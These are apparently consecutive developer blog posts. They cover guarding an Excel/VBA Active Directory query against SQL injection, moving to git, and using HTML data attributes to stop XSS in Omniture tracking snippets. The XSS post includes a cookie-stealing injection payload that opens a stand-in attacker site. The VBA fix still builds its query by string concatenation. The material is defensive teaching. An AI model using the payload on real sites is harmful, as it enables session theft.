You can see my previous SQL injection articles to come up with ideas of other things I can do now that I’ve got the ability to inject.

3. In which I try to be clever again

Normally, I’d suggest developers use Parameterised Queries to solve this problem – and that’s always the best idea, because it not only improves security, but it actually makes the query faster on subsequent runs, because it’s already optimised. Here’s how that ought to look:

   1: ADCommand.CommandText = _

   2:     "SELECT distinguishedName,userPrincipalName,mail FROM " & _

   3:     strBase & "WHERE objectCategory='user' AND mail=?"

   4:  

   5: 'Create and bind parameter

   6: Set ADParam = ADCommand.CreateParameter("", adVarChar, adParamInput, 40, email)

   7: ADCommand.Parameters.Append ADParam

That way, the question mark “?” gets replaced with “’youremail@example.com’” (including the single quote marks) and my injection attempt gets quoted in magical ways (usually, doubling single-quotes, but the parameter insertion is capable of knowing in what way it’s being inserted, and how exactly to quote the data).

4. In which I realise other people are idiot

uninterface

That’s the rather meaningful message:

Run-time error ‘-2147467262 (80004002)’:

No such interface supported

It doesn’t actually tell me which interface is supported, so of course I spend a half hour trying to figure out what changed that might have gone wrong – whether I’m using a question mark where perhaps I might need a named variable, possibly preceded by an “@” sign, but no, that’s SQL stored procedures, which are almost never the SQL injection solution they claim to be, largely because the same idiot who uses concatenation in his web service also does the same stupid trick in his SQL stored procedures, but I’m rambling now and getting far away from the point if I ever had one, so…

The interface that isn’t supported is the ability to set parameters.

The single best solution to SQL injection just plain isn’t provided in the ADODB library and/or the ADsDSOObject provider.

Why on earth would you miss that out, Microsoft?

5. I get clever

So, the smart answer here is input validation where possible, and if you absolutely have to accept any and all input, you must quote the strings that you’re passing in.

In my case, because I’m dealing with email addresses, I think I can reasonably restrict my input to alphanumerics, the “@” sign, full stops, hyphens and underscores.

Input validation depends greatly on the type of your input. If it’s a string, that will need to be provided in your SQL request surrounded with single quotes – that means that any single quote in the string will need to be encoded safely. Usually that means doubling the quote mark, although you might choose to replace them with double quotes or back ticks.

If your input is a number, you can be more restrictive in your input validation – only those characters that are actually parts of a number. That’s not necessarily as easy as it sounds – the letter “e” is often part of numbers, for instance, and you have to decide whether you’re going to accept bases other than 10. But from the perspective of securing against SQL injection, again that’s not too difficult to enforce.

Finally, of course, you have to decide what to do when bad input comes in – an error response, a static value, throw an exception, ignore the input and refuse to respond, etc. If you choose to signal an error back to the user, be careful not to provide information an attacker could find useful.

What’s useful to an attacker?

Sometimes the mere presence of an error is useful.

Certainly if you feed back to the attacker the full detail of the SQL query that went wrong – and people do sometimes do this! – you give the attacker far too much information.

Even feeding back the incorrect input can be a bad thing in many cases. In the Excel case I’m running into, that’s probably not easily exploitable, but you probably should be cautious anyway – if it’s an attacker causing an error, they may want you to echo back their input to exploit something else.

Call to Microsoft

Seriously, Microsoft, this is an unforgiveable lapse – not only is there no ability to provide the single best protection, because you didn’t implement the parameter interface, but also your own samples provide examples of code that is vulnerable to SQL injections. [Here and here – the other examples I was able to find use hard-coded search filters.]

Microsoft, update your samples to demonstrate how to securely query AD through the ADODB library, and consider whether it’s possible to extend the provider with the parameter interface so that we can use the gold-standard protection.

Call to developers

Parse your parameters – make sure they conform to expected values. Complain to the user when they don’t. Don’t use lack of samples as a reason not to deliver secure components.

Finally – how I did it right

And, because I know a few of you will hope to copy directly from my code, here’s how I wound up doing this exact function.

Please, by all means review it for mistakes – I don’t guarantee that this is correct, just that it’s better than I found originally. For instance, one thing it doesn’t check for is if the user actually has a value set for the “mail” field in Active Directory – I can tell you for certain, it’ll give a null reference error if you have one of these users come back from your search.

   1: Function GetEmail(email As String) As String

   2: ' Given one of this users' email addresses, find the canonical one.

   3:  

   4: ' Pre-execution input validation - email must contain only recognised characters.

   5: If email Like "*[!a-zA-Z0-9_@.]*" Then

   6: GetEmail = "Illegal characters"

   7: Exit Function

   8: End If

   9:  

  10:  

  11: ' Find our default domain base to search from

  12: Set objRootDSE = GetObject("LDAP://RootDSE")

  13: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

  14:  

  15: ' Open a connection to AD

  16: Set ADOConnection = CreateObject("ADODB.Connection")

  17: ADOConnection.Provider = "ADsDSOObject"

  18: ADOConnection.Open "Active Directory Provider"

  19:  

  20: ' Create a command

  21: Set ADCommand = CreateObject("ADODB.Command")

  22: ADCommand.ActiveConnection = ADOConnection

  23:  

  24: 'Find user based on their email address

  25: ADCommand.CommandText = _

  26: "SELECT distinguishedName,userPrincipalName,mail FROM " & _

  27: strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

  28:  

  29: ' Execute this command

  30: Set ADrecordset = ADCommand.Execute

  31:  

  32: ' Post execution validation - we should have exactly one answer.

  33: If ADrecordset Is Nothing Or (ADrecordset.EOF And ADrecordset.BOF) Then

  34: GetEmail = "Not found"

  35: Exit Function

  36: End If

  37: If ADrecordset.RecordCount > 1 Then

  38: GetEmail = "Many matches"

  39: Exit Function

  40: End If

  41:  

  42: ' Extract the canonical email address for this user.

  43: GetEmail = ADrecordset.Fields("Mail")

  44:  

  45: ' Return.

  46: End Function

As always, let me know if you find this at all useful.

Get on with git

Out with the old

Version control is one of those vital tools for developers that everyone has to use but very few people actually enjoy or understand.

So, it’s with no surprise that I noted a few months ago that the version control software on which I’ve relied for several years for my personal projects, Component Software’s CS-RCS, has not been built on in years, and cannot now be downloaded from its source site. [Hence no link from this blog]

Not so in with the new

I’ve used git before a few times in professional projects while I was working at Amazon, but relatively reluctantly – it has incredibly baroque and meaningless command-line options, and gives the impression that it was written by people who expected their users to be just as proficient with the ins and outs of version control as they are.

While I think it’s a great idea for developers to build software they would use themselves, I think it’s important to make sure that the software you build is also accessible by people who aren’t the same level of expertise as yourself. After all, if your users were as capable as the developer, they would already have built the solution for themselves, so your greater user-base comes from accommodating novices to experts with simple points of entry and levels of improved mastery.

git, along with many other open source, community-supported tools, doesn’t really accommodate the novice.

As such, it means that most people who use it rely on “cookbooks” of sets of instructions. “If you want to do X, type commands Y and Z” – without an emphasis on understanding why you’re doing this.

This leads inexorably to a feeling that you’re setting yourself up for a later fall, when you decide you want to do an advanced task, but discover that a decision you’ve made early on has prevented you from doing the advanced task in the way you want.

That’s why I’ve been reluctant to switch to git.

So why switch now?

But it’s clear that git is the way forward in the tools I’m most familiar with – Visual Studio and its surrounding set of developer applications.

It’s one of those decisions I’ve made some time ago, but not enacted until now, because I had no idea how to start – properly. Every git repository I’ve worked with so far has either been set up by someone else, or set up by me, based on a cookbook, for a new project, and in a git environment that’s managed by someone else. I don’t even know if those terms, repository and environment, are the right terms for the things I mean.

There are a number of advanced things I want to do from the very first – particularly, I want to bring my code from the old version control system, along with its history where possible, into the new system.

And I have a feeling that this requires I understand the decisions I make when setting this up.

So, it was with much excitement that I saw a link to this arrive in my email:

capture20151224111306522

Next thing is I’m going to watch this, and see how I’m supposed to work with git. I’ll let you know how it goes.

HTML data attributes – stop my XSS

First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.

However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.

Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.

Now let’s set up the code we’re trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we’re passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here’s how it often looks:

<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

Let’s suppose that “SEARCH-STRING” above is the string for which I searched.

I can inject my code as a search for:

"-window.open("//badpage.com/"+document.cookie,"_top")-"

The second line then becomes:

s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";

Yes, I know you can’t subtract two strings, but JavaScript doesn’t know that until it’s evaluated the window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.

How do data attributes fix this?

A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hypen.

These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.

Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.

Because data attributes are HTML attributes, quoting their contents is easy. In fact, there’s really only a couple of quoting rules needed to consider.

  1. The attribute’s value must be quoted, either in double-quote or single-quote characters, but usually in double quotes because of XHTML
  2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
  3. Quote characters occurring in the value must be HTML encoded to “&quot;

Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.

Sidebar – why those rules?

HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you’re right:

  • <a onclick="prompt("1")">&lt;a onclick="prompt("1")"&gt;</a>

  • <a onclick = "prompt( 1 )">&lt;a onclick = "prompt( 1 )"&gt;</a>

  • <a onclick= prompt( 1 ) >&lt;a onclick= prompt( 1 ) &gt;</a>

  • <a onclick= prompt(" 1 ") >&lt;a onclick= prompt(" 1 ") &gt;</a>

  • <a onclick= prompt( "1" ) >&lt;a onclick= prompt( "1" ) &gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#9;"prompt( 1 )"&gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#32;"prompt( 1 )"&gt;</a>

  • <a onclick= thing=1;prompt(thing)>&lt;a onclick= thing=1;prompt(thing)&gt;</a>

  • <a onclick="prompt(\"1\")">&lt;a onclick="prompt(\"1\")"&gt;</a>

Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?

Here’s how they look in the Debugger in Internet Explorer 11:

image

Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.

OK, let’s try the DOM Explorer:

image

Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).

Other browsers have similar capabilities, of course – use whichever one works for you.

Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.

Back to the data-attributes

So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-something-or-other”.

Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you’re operating inside of an event handler, you can simply use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).

If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)

Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.

Other frameworks have ways of accessing this data attribute more easily – for instance, JQuery has a “.data(…)” function which will fetch a data attribute’s value.

How this stops my XSS

I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.

If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.

One final gotcha

You can still kick your own arse.

When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?

Please don’t say “eval”.

Eval is evil. Just like innerHtml and document.write, its use is an invitation to Cross-Site Scripting.

Use parseFloat() and parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.

So, now I’m hoping your Omniture script looks like this:

<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?

P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.